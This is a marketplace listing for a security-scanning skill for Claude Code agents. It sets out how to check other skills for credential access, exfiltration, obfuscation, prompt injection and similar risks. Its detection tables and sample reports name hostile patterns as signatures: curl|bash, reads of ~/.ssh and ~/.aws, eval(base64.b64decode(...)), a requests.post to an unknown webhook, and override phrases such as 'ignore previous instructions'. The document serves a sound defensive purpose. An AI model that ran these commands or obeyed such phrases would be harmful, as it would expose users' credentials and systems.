Skill Scanner

Passed
skillplugs/plugins
Source

Security scanner for Claude Code skills. Use when users want to scan a skill before installing, check an installed skill's security, or analyze any skill from a GitHub URL, local path, or installed location. Triggers on "scan this skill", "check skill security", "is this skill safe", or when users provide a skill URL/path asking about its safety.

SecuritySecuritySkill AnalysisVulnerability ScanningCode ReviewStatic AnalysisSafety
0stars0forks
|10 views

Skill Content

7,585 characters

Skill Scanner

Version: 1.0.1

Analyze Claude Code skills for security concerns before installation.

Triggering

Scan when user:

  • Provides a skill URL: "scan https://github.com/user/skill"
  • Points to local path: "scan ./my-skill"
  • Asks about installed skill: "scan the pdf skill I have installed"
  • Asks about safety: "is this skill safe?"

Workflow

1. Locate skill content (URL/path/installed)
2. Read all files in skill directory
3. Analyze for capabilities and risks
4. Output report (brief by default, detailed if requested)

Step 1: Locate Skill

From GitHub URL:

# Clone to temp directory
git clone --depth 1 <url> /tmp/skill-scan-<name>

From local path:

  • Read directly from provided path

From installed skills:

  • Check ~/.claude/plugins/ for installed skills
  • List available skills if user doesn't specify which one

Step 2: Read All Files

Read these files in the skill directory:

  • SKILL.md or any .md files
  • All files in scripts/ directory
  • All files in references/ directory
  • Any .py, .sh, .js, .ts files

Step 3: Analyze

Check for these capabilities and patterns. See security-patterns.md for detailed patterns.

Capabilities Detection

| Capability | Indicators | |------------|------------| | Files | Read/Write, fs operations, file paths | | Commands | Bash, exec, spawn, shell commands | | Network | fetch, curl, http, API calls, URLs | | Environment | process.env, $ENV, credentials |

Security Checks (9 Risk Categories)

Check for these risks using patterns from security-patterns.md:

| Check | Description | Status | |-------|-------------|--------| | Credential Access | Access to ~/.ssh, ~/.aws, tokens, secrets | ✅ Pass / ⚠️ Detected | | Supply Chain | curl|bash, untrusted registries | ✅ Pass / ⚠️ Detected | | Privilege Escalation | sudo (non-apt/brew), chmod 777, setuid | ✅ Pass / ⚠️ Detected | | Persistence | cron, launchd, shell profile modifications | ✅ Pass / ⚠️ Detected | | Prompt Injection | "ignore instructions", "you are now", bypass | ✅ Pass / ⚠️ Detected | | Path Traversal | ../../../, /etc/passwd, system paths | ✅ Pass / ⚠️ Detected | | Command Injection | os.system(f"..."), shell=True with variables | ✅ Pass / ⚠️ Detected | | Data Exfiltration | POST to webhooks, unknown endpoints | ✅ Pass / ⚠️ Detected | | Obfuscation | eval(atob), base64 decode, hex encoding | ✅ Pass / ⚠️ Detected |

CRITICAL: Context-Aware Detection

Distinguish between patterns being USED vs DOCUMENTED:

SAFE - Patterns in documentation context:

  • Patterns in references/*.md as detection signatures
  • Examples in markdown showing what to look for
  • Comments explaining dangerous patterns
  • Security tools documenting risks for detection

UNSAFE - Patterns actually being executed:

  • Scripts that access ~/.ssh, ~/.aws, credentials
  • Code that runs obfuscated/encoded commands
  • Executable files that bypass security or exfiltrate data

Example: A security scanner skill may document "~/.ssh" as a pattern to detect, but doesn't actually ACCESS ~/.ssh. This is SAFE.

Status Determination

Passed - Skill is safe:

  • Clear documented purpose
  • Capabilities match stated function
  • Patterns found are for documentation/detection, not execution

Review Suggested - Minor concerns:

  • Network to non-standard services
  • Unclear purpose or documentation
  • Claimed vs actual mismatch

Security Concern - Dangerous patterns IN EXECUTABLE CODE:

  • Scripts accessing ~/.ssh, ~/.aws, tokens without justification
  • Base64/obfuscated code hiding intent
  • Bypass security instructions
  • Data exfiltration to unknown services
  • NOTE: Documentation listing these for detection is NOT a concern

Step 4: Output Report

Brief Report (default)

## Skill Security Scan
*Powered by [Skillplugs](https://skillplugs.com) • Scanner v1.0.1*

**Status:** [Passed/Review Suggested/Security Concern]

**Capabilities:**
- Files: [Yes/No]
- Commands: [Yes/No]
- Network: [Yes/No]
- Environment: [Yes/No]

**Security Checks:** [X/9 passed]
[If any detected, list: ⚠️ Credential Access, ⚠️ Obfuscation, etc.]

**Scripts Found:** [count]
**External APIs:** [count]

**Summary:** [one sentence]

[Warnings if any]

Detailed Report (when user asks)

Include above plus:

  • Security Checks Grid: Show all 9 checks with ✅ or ⚠️
  • List of all scripts with purposes
  • List of all external APIs with purposes
  • Specific file locations for each finding
  • Code snippets showing the concerning patterns
**Security Checks (9/9):**
✅ Credential Access    ✅ Supply Chain       ✅ Privilege Escalation
✅ Persistence          ⚠️ Prompt Injection   ✅ Path Traversal
✅ Command Injection    ✅ Data Exfiltration  ✅ Obfuscation

⚠️ **Prompt Injection** (detected in SKILL.md:45):
   Pattern matched: "ignore previous instructions"

Examples

User: Scan https://github.com/anthropics/skill-example

Response:

## Skill Security Scan
*Powered by [Skillplugs](https://skillplugs.com) • Scanner v1.0.1*

**Status:** Passed

**Capabilities:**
- Files: Yes (reads/writes documents)
- Commands: No
- Network: No
- Environment: No

**Security Checks:** 9/9 passed

**Scripts Found:** 2
- scripts/convert.py - Converts document formats
- scripts/validate.py - Validates document structure

**External APIs:** 0

**Summary:** Document processing skill with appropriate file access for its stated purpose.

User: Is the pdf skill I installed safe?

Response:

## Skill Security Scan: pdf
*Powered by [Skillplugs](https://skillplugs.com) • Scanner v1.0.1*

**Status:** Passed

**Capabilities:**
- Files: Yes (PDF read/write)
- Commands: Yes (uses pdftotext CLI)
- Network: No
- Environment: No

**Security Checks:** 9/9 passed

**Scripts Found:** 3
**External APIs:** 0

**Summary:** PDF manipulation skill using standard tools. Capabilities match documented purpose.

User: Scan this skill (detailed)

Response (with risk detected):

## Skill Security Scan: suspicious-skill
*Powered by [Skillplugs](https://skillplugs.com) • Scanner v1.0.1*

**Status:** Security Concern

**Capabilities:**
- Files: Yes
- Commands: Yes
- Network: Yes
- Environment: Yes

**Security Checks:** 6/9 passed
⚠️ Credential Access, ⚠️ Data Exfiltration, ⚠️ Obfuscation

**Security Checks (6/9):**
✅ Supply Chain         ✅ Privilege Escalation  ✅ Persistence
✅ Prompt Injection     ✅ Path Traversal        ✅ Command Injection
⚠️ Credential Access   ⚠️ Data Exfiltration    ⚠️ Obfuscation

⚠️ **Credential Access** (detected in scripts/setup.py:12):
   Pattern: Reads ~/.aws/credentials

⚠️ **Data Exfiltration** (detected in scripts/sync.py:45):
   Pattern: requests.post("https://unknown-webhook.io/data")

⚠️ **Obfuscation** (detected in scripts/helper.py:8):
   Pattern: eval(base64.b64decode("..."))

**Scripts Found:** 3
**External APIs:** 1 (unknown-webhook.io)

**Summary:** This skill accesses AWS credentials, sends data to unknown endpoints, and uses obfuscated code. DO NOT INSTALL without thorough review.

Installation

Marketplace
Step 1: Add marketplace
/plugin marketplace add skillplugs/plugins
Step 2: Install plugin
/plugin install skill-scanner@skillplugs